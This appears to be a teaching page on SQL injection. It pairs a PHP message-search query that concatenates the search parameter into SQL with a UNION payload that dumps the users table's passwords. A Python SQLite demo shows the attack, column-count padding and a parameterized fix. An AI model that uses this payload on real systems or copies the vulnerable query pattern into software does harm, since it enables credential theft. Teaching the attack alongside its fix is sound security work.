Example 2
<?php
// connect to DB (CONNECTION_STRING, DB_USER and DB_PASS are assumed to be defined elsewhere)
$db = new PDO(CONNECTION_STRING, DB_USER, DB_PASS);
session_start();
// search for messages sent to the logged-in user, together with the sender of each message;
// $_GET["search"] is concatenated straight into the SQL string, which is the injection point
$query = "SELECT sender, content FROM messages WHERE
receiver = '" . $_SESSION["user"] . "' AND
content LIKE '%" . $_GET["search"] . "%'";
// show a list with sender and message content for all messages sent to the user
...
?>
Exploit: Dumping all the data from the users table
The two SELECTs combined by UNION must return the same number of columns; otherwise the injected SELECT has to be padded with ,1 (or a similar constant) until the column counts match.
receiver: attacker (taken from the session; the attacker only controls the search parameter)
search: ' UNION SELECT user, password FROM users -- -
Resulting query:
SELECT sender, content FROM messages WHERE receiver='attacker'
AND content LIKE '%' UNION SELECT user, password FROM
users -- - %'
The -- comments out the rest of the line, including the trailing %' of the original query. The extra - after -- ensures that the comment marker is followed by whitespace (required by MySQL) even if a trailing space is stripped from the URL parameter.
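As an added, runnable illustration that is not part of the original page: the same vulnerable query built by string concatenation in Python over an in-memory SQLite database, the UNION payload from above dumping the users table, the column-count mismatch the text warns about together with the ,1 padding that repairs it, and a parameterized version of the query that the payload no longer affects. The tables, the sample rows and the helper names (make_db, search_vulnerable, search_fixed, inject) are constructed for this example and are not from the page.

```python
import sqlite3


def make_db():
    """Constructed in-memory SQLite database mirroring the page's schema (sample data is invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user TEXT, password TEXT);
        CREATE TABLE messages (sender TEXT, receiver TEXT, content TEXT);
        INSERT INTO users VALUES ('alice', 'hunter2'), ('bob', 'passw0rd');
        INSERT INTO messages VALUES
            ('alice', 'attacker', 'hello'),
            ('alice', 'bob', 'secret plans');
    """)
    return conn


def search_vulnerable(conn, user, search):
    """Same construction as the PHP snippet: the search term is concatenated into the SQL text."""
    query = ("SELECT sender, content FROM messages WHERE receiver = '" + user
             + "' AND content LIKE '%" + search + "%'")
    return conn.execute(query).fetchall()


def search_fixed(conn, user, search):
    """Hardened version: placeholders keep the search term as data, never as SQL."""
    query = "SELECT sender, content FROM messages WHERE receiver = ? AND content LIKE ?"
    return conn.execute(query, (user, "%" + search + "%")).fetchall()


def inject(conn, payload):
    """Run the vulnerable search as the logged-in user 'attacker' with an attacker-chosen search string.

    Returns ("ok", rows) when the database accepts the query and ("error", message) when it
    rejects it, which is what happens when the two UNION halves have different column counts.
    """
    try:
        return "ok", search_vulnerable(conn, "attacker", payload)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = make_db()
    # Column counts match: message rows and users rows come back in one result set.
    print(inject(db, "' UNION SELECT user, password FROM users -- -"))
    # One column against two: the database refuses the UNION.
    print(inject(db, "' UNION SELECT user FROM users -- -"))
    # Padding the injected SELECT with a constant restores the column count.
    print(inject(db, "' UNION SELECT user, 1 FROM users -- -"))
    # The parameterized query treats the whole payload as a LIKE pattern and matches nothing.
    print(search_fixed(db, "attacker", "' UNION SELECT user, password FROM users -- -"))
```

Note that the parameterized version stops the injection but still hands the attacker the LIKE wildcards: a search of % matches every message addressed to the attacker, which is acceptable here because the receiver predicate still comes from the session.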